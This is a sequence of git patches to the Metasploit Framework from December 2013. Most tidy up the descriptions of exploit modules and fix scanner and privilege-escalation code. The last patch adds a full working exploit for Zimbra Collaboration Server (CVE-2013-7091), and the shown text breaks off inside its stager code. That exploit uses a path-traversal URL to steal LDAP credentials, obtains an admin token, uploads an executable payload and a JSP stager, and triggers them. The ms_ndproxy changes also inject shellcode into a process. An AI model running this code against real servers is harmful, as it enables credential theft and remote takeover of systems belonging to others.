a/modules/exploits/multi/http/coldfusion_rds.rb +++ b/modules/exploits/multi/http/coldfusion_rds.rb @@ -17,11 +17,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Adobe ColdFusion 9 Administrative Login Bypass', 'Description' => %q{ - Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to bypass authentication using the RDS component. Its password can - by default or by misconfiguration be set to an empty value. This allows you to create a session via the RDS login that - can be carried over to the admin web interface even though the passwords might be different. Therefore bypassing - authentication on the admin web interface which then could lead to arbitrary code execution. - Tested on Windows and Linux with ColdFusion 9. + Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote + attackers to bypass authentication using the RDS component. Due to + default settings or misconfiguration, its password can be set to an + empty value. This allows an attacker to create a session via the RDS + login that can be carried over to the admin web interface even though + the passwords might be different, and therefore bypassing authentication + on the admin web interface leading to arbitrary code execution. Tested + on Windows and Linux with ColdFusion 9. }, 'Author' => [ diff --git a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb index bac8ced7a7..e9e4017905 100644 --- a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb +++ b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb @@ -19,10 +19,10 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'HP LoadRunner EmulationAdmin Web Service Directory Traversal', 'Description' => %q{ - This module exploits a directory traversal vulnerability on the version 11.52 of HP - LoadRunner. The vulnerability exists on the EmulationAdmin web service, specifically - in the copyFileToServer method, allowing to upload arbitrary files. This module has - been tested successfully on HP LoadRunner 11.52 over Windows 2003 SP2. + This module exploits a directory traversal vulnerability in version 11.52 of HP + LoadRunner. The vulnerability exists in the EmulationAdmin web service, specifically + in the copyFileToServer method, allowing the upload of arbitrary files. This module has + been tested successfully on HP LoadRunner 11.52 on Windows 2003 SP2. }, 'Author' => [ diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb index 0b9a32f593..d46648964d 100644 --- a/modules/exploits/windows/local/ms_ndproxy.rb +++ b/modules/exploits/windows/local/ms_ndproxy.rb @@ -18,10 +18,10 @@ class Metasploit3 < Msf::Exploit::Local 'Name' => 'Microsoft Windows ndproxy.sys Local Privilege Escalation', 'Description' => %q{ This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003 - SP2 systems, exploited on the wild on November 2013. The vulnerability exists while + SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used - to unsafely access an array, and the value is used to perform a call, leading to a NULL - pointer dereference, which is exploitable on both Windows XP and Windows 2003 systems. This + to access an array unsafely, and the value is used to perform a call, leading to a NULL + pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to work the service "Routing and Remote Access" must be running on the target system. }, diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index 3251dd06a3..33223ce462 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -26,12 +26,11 @@ class Metasploit3 < Msf::Exploit::Local 'Description' => %q{ The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to interact with the service. It contains a stacked based buffer overflow as a result - of a memmove operation. - - N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr! + of a memmove operation. Note the slight spelling differences: the executable is 'nvvsvc.exe', + the service name is 'nvsvc', and the named pipe is 'nsvr'. This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012. - It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012. + It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/post/multi/manage/play_youtube.rb b/modules/post/multi/manage/play_youtube.rb index fda5611bcc..1426bbc657 100644 --- a/modules/post/multi/manage/play_youtube.rb +++ b/modules/post/multi/manage/play_youtube.rb @@ -13,9 +13,9 @@ class Metasploit3 < Msf::Post super( update_info( info, 'Name' => 'Multi Manage Youtube Broadcast', 'Description' => %q{ - This module will broadcast a Youtube video on all compromised systems. It will play + This module will broadcast a Youtube video on specified compromised systems. It will play the video in the target machine's native browser in full screen mode. The VID datastore - option is the "v" parameter in your Youtube video's URL. + option is the "v" parameter in a Youtube video's URL. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], @@ -70,6 +70,7 @@ class Metasploit3 < Msf::Post # # The Linux version uses Firefox + # TODO: Try xdg-open? # def linux_start_video(id) begin @@ -92,7 +93,7 @@ class Metasploit3 < Msf::Post rescue EOFError return false end - + true end diff --git a/modules/post/windows/manage/ie_proxypac.rb b/modules/post/windows/manage/ie_proxypac.rb index aef00af5d9..8b3c9f2862 100644 --- a/modules/post/windows/manage/ie_proxypac.rb +++ b/modules/post/windows/manage/ie_proxypac.rb @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Manage Proxy PAC File', 'Description' => %q{ This module configures Internet Explorer to use a PAC proxy file. By using the LOCAL_PAC - option, a PAC file will be created in the victim host. It's also possible to provide a + option, a PAC file will be created on the victim host. It's also possible to provide a remote PAC file (REMOTE_PAC option) by providing the full URL. }, 'License' => MSF_LICENSE, diff --git a/test/modules/auxiliary/test/httpserver.rb b/test/modules/auxiliary/test/httpserver.rb index 6e4d8ea39c..b40819d862 100644 --- a/test/modules/auxiliary/test/httpserver.rb +++ b/test/modules/auxiliary/test/httpserver.rb @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Auxiliary end =begin - + Test Results - clinet output: msf auxiliary(cisco_asa_asdm) > run @@ -149,6 +149,5 @@ msf auxiliary(httpserver) > run [-] 10.0.1.76 httpserver - Bad login [*] 10.0.1.76 httpserver - Received request: /+webvpn+/index.html [+] Authenticated - - + =end From 04b7e8b1743f73e13bdc25ab8f21cd9f2d4bf173 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 16 Dec 2013 14:59:00 -0600 Subject: [PATCH 065/205] Fix module title and add vendor patch information --- modules/exploits/windows/browser/adobe_toolbutton.rb | 3 ++- modules/exploits/windows/fileformat/adobe_toolbutton.rb | 3 ++- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_toolbutton.rb b/modules/exploits/windows/browser/adobe_toolbutton.rb index c861610199..c8c8667cd0 100644 --- a/modules/exploits/windows/browser/adobe_toolbutton.rb +++ b/modules/exploits/windows/browser/adobe_toolbutton.rb @@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info={}) super(update_info(info, - 'Name' => "Adobe ToolButton Use After Free", + 'Name' => "Adobe Reader ToolButton Use After Free", 'Description' => %q{ This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where @@ -35,6 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2013-3346' ], [ 'OSVDB', '96745' ], [ 'ZDI', '13-212' ], + [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ], [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ] ], 'Platform' => 'win', diff --git a/modules/exploits/windows/fileformat/adobe_toolbutton.rb b/modules/exploits/windows/fileformat/adobe_toolbutton.rb index 5decadeacd..25acd902df 100644 --- a/modules/exploits/windows/fileformat/adobe_toolbutton.rb +++ b/modules/exploits/windows/fileformat/adobe_toolbutton.rb @@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Adobe ToolButton Use After Free', + 'Name' => 'Adobe Reader ToolButton Use After Free', 'Description' => %q{ This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where @@ -35,6 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2013-3346' ], [ 'OSVDB', '96745' ], [ 'ZDI', '13-212' ], + [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ], [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ] ], 'Payload' => From f88a3a55b6e7678e1a862ba7e245ccf861b324d9 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 16 Dec 2013 15:05:39 -0600 Subject: [PATCH 066/205] More slight updates. --- modules/exploits/windows/browser/adobe_toolbutton.rb | 6 +++--- modules/exploits/windows/fileformat/adobe_toolbutton.rb | 8 ++++---- 2 files changed, 7 insertions(+), 7 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_toolbutton.rb b/modules/exploits/windows/browser/adobe_toolbutton.rb index c8c8667cd0..5432fbf4f3 100644 --- a/modules/exploits/windows/browser/adobe_toolbutton.rb +++ b/modules/exploits/windows/browser/adobe_toolbutton.rb @@ -17,9 +17,9 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object - allows to trigger the use after free condition. This module has been tested successfully - on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild on - November 2013. At the moment this module doesn't support Adobe Reader 9 targets, in order + allows triggering the use after free condition. This module has been tested successfully + on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in + November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order to exploit Adobe Reader 9 the fileformat version of the exploit can be used. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/adobe_toolbutton.rb b/modules/exploits/windows/fileformat/adobe_toolbutton.rb index 25acd902df..ec62fc7114 100644 --- a/modules/exploits/windows/fileformat/adobe_toolbutton.rb +++ b/modules/exploits/windows/fileformat/adobe_toolbutton.rb @@ -18,9 +18,9 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object - allows to trigger the use after free condition. This module has been tested successfully - on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild on - November 2013. + allows triggering the use after free condition. This module has been tested successfully + on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in + November, 2013. }, 'License' => MSF_LICENSE, 'Author' => @@ -358,4 +358,4 @@ cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213 AcroRd32_60000000!DllCanUnloadNow+0x1493ae: 60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=???????? -=end \ No newline at end of file +=end From 24bc10905e4da1b9bba91cb5442fbbc242051631 Mon Sep 17 00:00:00 2001 From: SeawolfRN Date: Mon, 16 Dec 2013 22:12:35 +0000 Subject: [PATCH 067/205] Added Spaces and removed Interrupt --- .../auxiliary/scanner/misc/poisonivy_control_scanner.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb index f7fa709c4c..0e68abd41d 100644 --- a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb +++ b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb @@ -59,10 +59,10 @@ class Metasploit3 < Msf::Auxiliary ) r << [ip,port,"open",'Unknown'] s.send("\x00"*0x100,0) #Send 0x100 zeros, wait for answer - data=s.recv(0x100) - if data.length==0x100 - data=s.recv(0x4) - if data=="\xD0\x15\x00\x00" #Signature for PIVY C&C + data = s.recv(0x100) + if data.length == 0x100 + data = s.recv(0x4) + if data == "\xD0\x15\x00\x00" #Signature for PIVY C&C print_status("#{ip}:#{port} - C&C Server Found") r << [ip,port,"open",'Poison Ivy C&C'] end @@ -72,7 +72,6 @@ class Metasploit3 < Msf::Auxiliary r << [ip,port,"closed",''] rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error rescue ::Rex::Post::Meterpreter::RequestError - rescue ::Interrupt raise $! ensure disconnect(s) rescue nil From 042bd4f80be251a4f3b4c196be13ab7fd6f2689b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 16 Dec 2013 16:19:17 -0600 Subject: [PATCH 068/205] Fix ms_ndproxy to work under a sandboxed Reader --- modules/exploits/windows/local/ms_ndproxy.rb | 22 ++++++++++++++++---- 1 file changed, 18 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb index d46648964d..a4a5cf23ca 100644 --- a/modules/exploits/windows/local/ms_ndproxy.rb +++ b/modules/exploits/windows/local/ms_ndproxy.rb @@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Local invalid_handle_value = 0xFFFFFFFF - r = session.railgun.kernel32.CreateFileA(dev, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", 0, 0) + r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0) handle = r['return'] @@ -234,7 +234,14 @@ class Metasploit3 < Msf::Exploit::Local windir = expand_path("%windir%") cmd = "#{windir}\\System32\\notepad.exe" # run hidden - proc = session.sys.process.execute(cmd, nil, {'Hidden' => true }) + begin + proc = session.sys.process.execute(cmd, nil, {'Hidden' => true }) + rescue Rex::Post::Meterpreter::RequestError + # when running from the Adobe Reader sandbox: + # Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied. + return nil + end + return proc.pid end @@ -424,17 +431,24 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Failure::Unknown, "The exploitation wasn't successful") end + p = payload.encoded print_good("Exploitation successful! Creating a new process and launching payload...") new_pid = create_proc - p = payload.encoded + + if new_pid.nil? + print_warning("Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...") + end print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...") - if execute_shellcode(p, nil, new_pid) + shellcode_executed = execute_shellcode(p, nil, new_pid) + + if shellcode_executed print_good("Enjoy") else fail_with(Failure::Unknown, "Error while executing the payload") end + end end From 84759a552acc2eef34a6b6bffc688abe0b127cd5 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 16 Dec 2013 16:49:44 -0600 Subject: [PATCH 069/205] Save one variable --- modules/exploits/windows/local/ms_ndproxy.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb index a4a5cf23ca..d439acf815 100644 --- a/modules/exploits/windows/local/ms_ndproxy.rb +++ b/modules/exploits/windows/local/ms_ndproxy.rb @@ -437,12 +437,11 @@ class Metasploit3 < Msf::Exploit::Local if new_pid.nil? print_warning("Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...") + return end print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...") - shellcode_executed = execute_shellcode(p, nil, new_pid) - - if shellcode_executed + if execute_shellcode(p, nil, new_pid) print_good("Enjoy") else fail_with(Failure::Unknown, "Error while executing the payload") From 6ee1a9c6e1acc190932ab25d4a428419c7d124e1 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Tue, 17 Dec 2013 00:11:37 +0000 Subject: [PATCH 070/205] Fix duplicate error --- lib/msf/core/post/windows/error.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/post/windows/error.rb b/lib/msf/core/post/windows/error.rb index f8a17513ef..6557d729a1 100644 --- a/lib/msf/core/post/windows/error.rb +++ b/lib/msf/core/post/windows/error.rb @@ -1843,7 +1843,7 @@ module Msf::Post::Windows::Error DS_DUP_LINK_ID = 0x2114 DS_NAME_RESOLVING = 0x2115 DS_NAME_NOT_FOUND = 0x2116 - DS_NAME_NOT_UNIQUE = 0x2117 + DS_NAME_ERROR_NOT_UNIQUE = 0x2117 DS_NAME_NO_MAPPING = 0x2118 DS_NAME_DOMAIN_ONLY = 0x2119 DS_NAME_NO_SYNTACTICAL_MAPPING = 0x211A From 07f686bb1ae6064dbd1efd00991fadbab03e9141 Mon Sep 17 00:00:00 2001 From: zeknox Date: Mon, 16 Dec 2013 18:46:14 -0600 Subject: [PATCH 071/205] added ResolverArgumentError rescue statement --- modules/auxiliary/gather/dns_cache_scraper.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb index 34137cfdd6..4b260c7c82 100644 --- a/modules/auxiliary/gather/dns_cache_scraper.rb +++ b/modules/auxiliary/gather/dns_cache_scraper.rb @@ -48,8 +48,8 @@ class Metasploit3 < Msf::Auxiliary # query dns begin query = res.send(domain) - rescue - print_error("Issues with #{domain}") + rescue ResolverArgumentError + print_error("Invalid domain: #{domain}") return end From 7b8de95f6be26775b78f155cd8903ecd67a0a104 Mon Sep 17 00:00:00 2001 From: zeknox Date: Mon, 16 Dec 2013 19:16:12 -0600 Subject: [PATCH 072/205] fixed database overwriting issues --- modules/auxiliary/gather/dns_cache_scraper.rb | 25 ++++++++----------- 1 file changed, 10 insertions(+), 15 deletions(-) diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb index 4b260c7c82..3134e657b1 100644 --- a/modules/auxiliary/gather/dns_cache_scraper.rb +++ b/modules/auxiliary/gather/dns_cache_scraper.rb @@ -59,6 +59,7 @@ class Metasploit3 < Msf::Auxiliary return end + @is_vulnerable = true print_good("#{domain} - Found") report_goods(domain) end @@ -78,32 +79,21 @@ class Metasploit3 < Msf::Auxiliary proto = "udp" end - report_service( - :host => datastore['NS'], - :name => "dns", - :port => 53, - :proto => proto, - :info => "#{domain} cached" - ) - report_note( :host => datastore['NS'], :name => "dns", :port => 53, :proto => proto, :type => "dns.cache.scrape", - :data => "#{domain} cached" - ) - - report_host( - :address => datastore['NS'], - :info => "#{domain} cached", - :comments => "DNS Cache Scraper" + :data => "#{domain} cached", + :update => :unique_data ) end # main control method def run + @is_vulnerable = false + print_status("Making queries against #{datastore['NS']}") if datastore['DOMAIN'].blank? @@ -111,6 +101,11 @@ class Metasploit3 < Msf::Auxiliary else scrape_dns(datastore['DOMAIN']) end + + report_vuln( + :host => datastore['NS'], + :name => "DNS Cache Snooping", + ) if @is_vulnerable end end From fe34d0e36ebb24c75f24d1af2185861b8fa931d4 Mon Sep 17 00:00:00 2001 From: zeknox Date: Mon, 16 Dec 2013 19:26:40 -0600 Subject: [PATCH 073/205] fixed syntax --- modules/auxiliary/gather/dns_cache_scraper.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb index 3134e657b1..4e01346e80 100644 --- a/modules/auxiliary/gather/dns_cache_scraper.rb +++ b/modules/auxiliary/gather/dns_cache_scraper.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary def scrape_dns(domain) # dns request with recursive disabled - use_tcp = datastore['TCP_DNS'] == true + use_tcp = datastore['TCP_DNS'] res = Net::DNS::Resolver.new(:nameservers => "#{datastore['NS']}", :recursive => false, :use_tcp => use_tcp) # query dns From 2eee34babfbe7e9c76f9fcdb3d9bcd1371a53c4f Mon Sep 17 00:00:00 2001 From: zeknox Date: Mon, 16 Dec 2013 20:00:13 -0600 Subject: [PATCH 074/205] added timeout options and rescue timeout --- modules/auxiliary/gather/dns_cache_scraper.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb index 4e01346e80..a59d692391 100644 --- a/modules/auxiliary/gather/dns_cache_scraper.rb +++ b/modules/auxiliary/gather/dns_cache_scraper.rb @@ -35,6 +35,7 @@ class Metasploit3 < Msf::Auxiliary register_advanced_options([ OptBool.new('TCP_DNS', [false, "Run queries over TCP", false]), + OptInt.new('DNS_TIMEOUT', [true, "DNS Timeout in seconds", 5]) ], self.class) end @@ -44,6 +45,7 @@ class Metasploit3 < Msf::Auxiliary # dns request with recursive disabled use_tcp = datastore['TCP_DNS'] res = Net::DNS::Resolver.new(:nameservers => "#{datastore['NS']}", :recursive => false, :use_tcp => use_tcp) + use_tcp ? res.tcp_timeout = datastore['DNS_TIMEOUT'] : res.udp_timeout = datastore['DNS_TIMEOUT'] # query dns begin @@ -51,6 +53,9 @@ class Metasploit3 < Msf::Auxiliary rescue ResolverArgumentError print_error("Invalid domain: #{domain}") return + rescue NoResponseError + print_error("DNS Timeout Issue: #{domain}") + return end # found or not found From 52cb43e6a83520c6fda81f411f5964e19f08ce9d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 16 Dec 2013 20:28:49 -0600 Subject: [PATCH 075/205] Fix typo --- modules/exploits/windows/local/ms_ndproxy.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb index d439acf815..f7b6041fe3 100644 --- a/modules/exploits/windows/local/ms_ndproxy.rb +++ b/modules/exploits/windows/local/ms_ndproxy.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Local 'License' => MSF_LICENSE, 'Author' => [ - 'Unkwnon', # Vulnerability discovery + 'Unknown', # Vulnerability discovery 'ryujin', # python PoC 'Shahin Ramezany', # C PoC 'juan vazquez' # MSF module From 2de15bdc8bd2808691022a725930425601835cce Mon Sep 17 00:00:00 2001 From: Mekanismen Date: Tue, 17 Dec 2013 19:32:04 +0100 Subject: [PATCH 076/205] added module for Zimbra Collaboration Server CVE-2013-7091 --- modules/exploits/unix/webapp/zimbra_lfi.rb | 234 +++++++++++++++++++++ 1 file changed, 234 insertions(+) create mode 100644 modules/exploits/unix/webapp/zimbra_lfi.rb diff --git a/modules/exploits/unix/webapp/zimbra_lfi.rb b/modules/exploits/unix/webapp/zimbra_lfi.rb new file mode 100644 index 0000000000..26733431ac --- /dev/null +++ b/modules/exploits/unix/webapp/zimbra_lfi.rb @@ -0,0 +1,234 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'uri' + + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + + Rank = GreatRanking + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Zimbra Collaboration Server LFI', + 'Description' => %q{ + A Local file inclusion exists in versions 8.0.2, 7.2.2 and possibly other versions which allows an attacker to get the LDAP + credentials from the localconfig.xml file. The stolen credentials enables the attacker to make requests to the service/admin/soap API. This can then be used + to create an authentication token for the admin web interface where an administrative user can be added or code execution could be leveraged. + Tested on Zimbra Collaboration Server 8.0.2 with Ubuntu Server 12.04. + }, + 'Author' => + [ + 'rubina119', # Vulnerability discovery + 'Mekanismen ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ "CVE", "2013-7091" ], + [ "EDB", "30085" ], + [ 'URL', "http://cxsecurity.com/issue/WLB-2013120097" ] + ], + 'Privileged' => false, + 'Platform' => ['linux'], + 'Targets' => + [ + [ 'Linux', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => "Dec 06 2013" + )) + register_options( + [ + OptPort.new('RPORT', [true, 'The target port', 7071]) + ]) + + register_advanced_options( + [ + OptBool.new('SSL', [ true, 'Negotiate SSL for outgoing connections', true]), + OptString.new('ALTDIR', [ false, 'Alternative zimbraAdmin directory', "zimbraAdmin"]) + ]) + end + + def check + uri = target_uri.path + turl = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00" + #doesnt want to play nice if used with vars_get + res = send_request_cgi({ + 'uri' => normalize_uri(uri, datastore['ALTDIR'], turl), + 'method' => 'GET', + }) + + unless res and res.code == 200 + return Exploit::CheckCode::Safe + end + + #this response is ~100% gzipped + begin + text = Rex::Text.ungzip(res.body) + rescue Zlib::GzipFile::Error + text = res.body + end + + if text =~ /name=\\"zimbra_user\\">";\sa\["(.*)<\/value>/ + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Safe + end + end + + def exploit + uri = target_uri.path + turl = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00" + #doesnt want to play nice if used with vars_get + res = send_request_cgi({ + 'uri' => normalize_uri(uri, datastore['ALTDIR'], turl), + 'method' => 'GET' + }) + + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL") + end + + print_status("#{peer} - Getting login credentials...") + #this response is ~100% gzipped + begin + text = Rex::Text.ungzip(res.body) + rescue Zlib::GzipFile::Error + text = res.body + end + + if text =~ /name=\\"zimbra_user\\">";\sa\["(.*)<\/value>/ + zimbra_user = $1 + else + fail_with(Failure::Unknown, "#{peer} - Unable to get login credentials") + end + + if text =~ /name=\\"zimbra_ldap_password\\">";\sa\["(.*)<\/value>/ + zimbra_pass = $1 + else + fail_with(Failure::Unknown, "#{peer} - Unable to get login credentials") + end + + print_good("#{peer} - Got login credentials!") + print_status("#{peer} - Getting auth token...") + + soap_req = "" + soap_req << "" + soap_req << "#{zimbra_user}#{zimbra_pass}" + + res = send_request_cgi({ + 'uri' => normalize_uri(uri, "/service/admin/soap"), + 'method' => 'POST', + 'ctype' => 'application/soap+xml; charset="utf-8"', + 'headers' => + { + 'SOAPAction' => '"urn:zimbraAdmin#AuthRequest"', + }, + 'data' => soap_req + }) + + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unable to access service URL") + end + + if res.body =~ /(.*)<\/authToken>/ + auth_token = $1 + else + fail_with(Failure::Unknown, "#{peer} - Unable to get auth token") + end + + cookie = "ZM_ADMIN_AUTH_TOKEN=#{auth_token}" + print_good("#{peer} - Got auth token!") + + #the initial POC for this vuln shows user creation with admin rights for the web interface, thats cool but a shell is even cooler + #the web interface has a function to upload the latest version of the desktop client via /service/extension/clientUploader/upload/ + #the intent is for a ZCO file, whatever that is. However any file will do and it's placed in /downloads/ which we can reach, how handy! + + #push our meterpreter and then a stager jsp file that sets correct permissions, executes the meterpreter and removes itself afterwards + payload_name = rand_text_alpha(8+rand(8)) + stager_name = rand_text_alpha(8+rand(8)) + ".jsp" + req_id = rand_text_numeric(2).to_s + + stager = gen_stager(payload_name) + dpayload = generate_payload_exe + + #upload payload + + print_status("#{peer} - Uploading .JSP stager and payload") + post_data = Rex::MIME::Message.new + post_data.add_part("#{payload_name}", nil, nil, "form-data; name=\"filename1\"") + post_data.add_part("#{dpayload}", "application/octet-stream", nil, "form-data; name=\"clientFile\"; filename=\"#{payload_name}\"") + post_data.add_part("#{req_id}", nil, nil, "form-data; name=\"requestId\"") + + n_data = post_data.to_s + n_data = n_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') + + res = send_request_cgi({ + 'uri' => normalize_uri(uri, "/service/extension/clientUploader/upload/"), + 'method' => 'POST', + 'ctype' => 'multipart/form-data; boundary=' + post_data.bound, + 'data' => n_data, + 'cookie' => cookie + }) + + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unable to get upload payload") + end + + #upload jsp stager + post_data = Rex::MIME::Message.new + post_data.add_part("#{stager_name}", nil, nil, "form-data; name=\"filename1\"") + post_data.add_part("#{stager}", "application/octet-stream", nil, "form-data; name=\"clientFile\"; filename=\"#{stager_name}\"") + post_data.add_part("#{req_id}", nil, nil, "form-data; name=\"requestId\"") + + n_data = post_data.to_s + n_data = n_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') + + res = send_request_cgi({ + 'uri' => normalize_uri(uri, "/service/extension/clientUploader/upload/"), + 'method' => 'POST', + 'ctype' => 'multipart/form-data; boundary=' + post_data.bound, + 'data' => n_data, + 'cookie' => cookie + }) + + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unable to upload stager") + end + + print_good("#{peer} - Stager and payload uploaded!") + print_status("#{peer} - Stager at #{peer}/downloads/#{stager_name}") + print_status("#{peer} - Executing payload!") + + res = send_request_cgi({ + 'uri' => normalize_uri(uri, "downloads", stager_name), + 'method' => 'GET', + }) + end + + def gen_stager(payload_name) + stager = "<%@ page import=\"java.util.*,java.io.*\"%>" + stager += " <%" + stager += " String uri = request.getRequestURI();" + stager += " String filename = uri.substring(uri.lastIndexOf(\"/\")+1);" + stager += " String jspfile = new java.io.File(application.getRealPath(request.getRequestURI())).getParent() + \"/\" + filename;" + stager += " String payload = new java.io.File(application.getRealPath(request.getRequestURI())).getParent() + \"/#{payload_name}\";" + stager += " 